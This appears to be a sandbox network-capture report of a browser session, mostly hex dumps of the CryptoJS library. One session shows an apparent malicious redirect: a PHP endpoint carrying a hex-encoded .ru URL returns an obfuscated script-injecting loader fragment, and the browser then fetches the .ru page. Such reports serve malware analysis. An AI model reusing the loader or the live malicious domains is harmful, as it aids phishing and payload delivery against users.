                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                                                                            Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                                                            Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                                                            2024-12-21 23:46:35 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                                                            Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44973969.49.245.1724435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:34 UTC429OUTGET /res444.php?2-68747470733a2f2f5446362e6a7175676263746364732e72752f307068312f-yewwood HTTP/1.1
                                                                                                            Host: billottisorganzing.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:35 UTC196INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:33 GMT
                                                                                                            Server: Apache
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Connection: close
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Content-Type: text/javascript;charset=UTF-8
                                                                                                            2024-12-21 23:46:35 UTC1973INData Raw: 37 61 39 0d 0a 20 20 20 20 76 61 72 20 69 73 43 4b 70 47 54 55 4d 67 66 4c 6e 4d 67 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 69 73 43 4b 70 47 54 55 4d 67 66 4c 6e 4d 67 68 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 69 73 43 4b 70 47 54 55 4d 67 66 4c 6e 4d 67 68 29 3b 0d 0a 69 73 43 4b 70 47 54 55 4d 67 66 4c 6e 4d 67 68 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                            Data Ascii: 7a9 var isCKpGTUMgfLnMgh = document.createElement("script");isCKpGTUMgfLnMgh.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(isCKpGTUMgfLnMgh);isCKpGTUMgfLnMgh.onload=function()


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.449742104.17.25.144435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:37 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:37 UTC958INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:37 GMT
                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                            ETag: W/"5eb03e2d-bb78"
                                                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            Timing-Allow-Origin: *
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 165205
                                                                                                            Expires: Thu, 11 Dec 2025 23:46:37 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0uGpQGc8VhaNLfAffFPkxBL3inYyYc%2BFW5H7JwMlLgHaI2Nf%2FNtyiNkBoD9Ye1lWpEoscj6U66mRt3e5MfVL4x2GsDOSBE8Q6vCt3mFKflOVZFT36E%2Bvu7z3QuliBCXpI2IL4U3q"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc0a7dc2e8c54-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:37 UTC411INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                            Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                            Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                                                                            Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                                                                            Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                                                                            Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                                                                            Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                                                                            Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                                                                            Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                                                            Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                                                            2024-12-21 23:46:37 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                                                            Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.449746104.21.24.1124435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:46:38 UTC651OUTGET /0ph1/ HTTP/1.1
                                                                                                            Host: tf6.jqugbctcds.ru
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                            Sec-Fetch-Dest: document
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:39 UTC1244INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:46:39 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache, private
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5CDe0s%2B1KYd1Az0pwHg%2B5Naqh7m8WcSUOMaXxLYRaihkJ%2FWZeSVG9qpMUrCdnSO2eCiRGjBO0P6oGCyNNu6ejIK9uB4LD3EEElUxQ6Q5%2FA6WNRXVyNT6Nz8p0AICQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5531&min_rtt=5526&rtt_var=2084&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1558&delivery_rate=511035&cwnd=245&unsent_bytes=0&cid=e52052cb39b9d665&ts=167&x=0"
